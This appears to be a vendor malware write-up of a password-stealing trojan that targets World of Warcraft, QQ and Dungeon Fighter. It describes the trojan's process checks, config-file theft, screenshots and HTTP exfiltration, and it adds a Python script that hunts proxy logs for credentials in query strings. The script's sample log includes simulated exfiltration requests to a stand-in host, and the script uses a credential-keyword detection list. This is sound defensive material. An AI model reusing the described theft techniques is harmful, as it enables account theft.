Trojan.Win32.PSW.gz

by alexander.adamov on May 7th, 2012 in Malware Descriptions.

Detect: Trojan.Win32.PSW.gz
Platform: Win32
Type: Trojan
Size: 61200 bytes

Packed: UPX
Unpacked size: 77072 bytes
Language: C++

Summary

Trojan.Win32.PSW.gz is a Trojan program designed to steal user passwords for online games and messenger clients.

Technical Details

Installation

The Trojan is installed by other malicious programs that are able to inject the Trojan's libraries into the address space of every process running on the system.

Payload

Once loaded, the Trojan checks the file name of the process it is running in. The Trojan stops running if the file has one of the following names:

  • QQLogin.exe, the executable file of Tencent QQ, the most popular instant messaging client in mainland China.
  • DNF.exe, the executable file of Dungeon Fighter Online, an online computer game.

If the file name is Wow.exe, the Trojan launches a separate thread. Wow.exe is the executable file of World of Warcraft, an online computer game.

In this thread, the Trojan steals the login and password for the services indicated above.

In addition, the Trojan steals the content of the World of Warcraft configuration file:

            %WowFolder%\WTF\config.wtf

where %WowFolder% is the folder where the World of Warcraft game client is stored.

In addition, the Trojan can take screenshots and save them in the current user's temporary folder with the ".jpg" extension.

The collected information is sent to the attacker's server as parameters of an HTTP request.
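The write-up says credentials leave the machine as parameters of an HTTP request issued from inside the game or messenger process. The script below is an added hunting example (not code from the description or from any product) that looks for exactly that pattern in a web-proxy log: requests attributed to one of the three process names named above whose query string carries credential-like parameters. The log line format, the sample lines, the host names and the list of credential-like parameter names are all assumptions constructed for the example; the page does not give the real parameter names or server.

```python
"""Hunt for credential exfiltration over HTTP query parameters from game/IM clients.

Added example for the Trojan.Win32.PSW.gz description. The proxy log format
("<timestamp> <client> <process> <method> <url> <status>"), the sample lines
and the credential-like key list are constructed assumptions, not page data.
"""
import re
from urllib.parse import urlparse, parse_qs

# Process file names the Trojan inspects (from the description).
TARGET_PROCESSES = {"wow.exe", "qqlogin.exe", "dnf.exe"}

# Query-string keys that suggest a login/password is being passed as an HTTP
# parameter. Heuristic chosen for this example; the page names no parameters.
CREDENTIAL_KEYS = {"user", "username", "account", "login", "pass", "password", "pwd"}

# Constructed sample proxy log (hosts use the reserved .invalid TLD).
SAMPLE_LOG = """\
2012-05-07T10:15:01 10.0.0.5 Wow.exe GET http://patch.example.invalid/patchlist 200
2012-05-07T10:15:02 10.0.0.5 Wow.exe GET http://collector.example.invalid/r.php?account=player1&pwd=s3cret&realm=eu 200
2012-05-07T10:15:03 10.0.0.5 firefox.exe GET http://www.example.invalid/index.html 200
2012-05-07T10:16:10 10.0.0.5 Wow.exe POST http://collector.example.invalid/up.php?id=7 200
2012-05-07T10:16:11 10.0.0.5 QQLogin.exe GET http://collector.example.invalid/r.php?user=abc&password=xyz 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def parse_line(line):
    """Split one proxy log line into a dict; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, process, method, url, status = m.groups()
    return {"ts": ts, "client": client, "process": process,
            "method": method, "url": url, "status": int(status)}


def credential_keys_in(url):
    """Return the sorted credential-like query keys present in a URL."""
    keys = {k.lower() for k in parse_qs(urlparse(url).query)}
    return sorted(keys & CREDENTIAL_KEYS)


def find_suspicious(log_text):
    """Flag requests from a targeted process whose query string carries credential-like keys."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["process"].lower() not in TARGET_PROCESSES:
            continue
        keys = credential_keys_in(rec["url"])
        if keys:
            hits.append({"ts": rec["ts"], "client": rec["client"],
                         "process": rec["process"],
                         "host": urlparse(rec["url"]).hostname, "keys": keys})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["client"]} {hit["process"]} -> {hit["host"]} '
              f'query keys {hit["keys"]}')
```

Run against the constructed log it reports two requests (one from Wow.exe, one from QQLogin.exe) and ignores the patch-list fetch, the browser traffic and the upload request whose only parameter is an id. A game client normally authenticates through its own protocol rather than plain HTTP GET parameters, so any hit from these processes is worth pulling the full request for.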

Removal Recommendations

  1. Delete the original Trojan file (its file name and location depend on how the Trojan originally got onto the user's computer).
  2. Run a full scan of your computer with an antivirus program using an up-to-date definition database (Download Ad-Aware Free).